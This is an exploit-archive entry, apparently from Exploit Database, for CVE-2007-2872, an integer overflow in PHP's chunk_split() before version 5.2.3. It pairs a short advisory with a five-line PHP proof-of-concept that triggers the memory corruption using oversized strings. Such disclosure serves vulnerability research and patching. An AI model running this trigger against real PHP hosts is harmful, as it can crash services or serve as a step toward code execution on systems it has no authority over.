[] NeoSense

PHP 5.1.6 - 'Chunk_Split()' Integer Overflow

Author: Gerhard Wagner
type: remote
platform: php
port: 
date_added: 2007-05-31 
date_updated: 2013-12-08 
verified: 1 
codes: CVE-2007-2872;OSVDB-36083 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/24261/info

PHP is prone to an integer-overflow vulnerability because it fails to ensure that integer values aren't overrun. Attackers may exploit this issue to cause a buffer overflow and to corrupt process memory.

Attackers may be able to execute arbitrary machine code in the context of the affected application. Failed exploit attempts will likely result in a denial-of-service condition.

This issue affects versions prior to PHP 5.2.3.

<?
          $a=str_repeat("A", 65535);
          $b=1;
          $c=str_repeat("A", 65535);
          chunk_split($a,$b,$c);
?>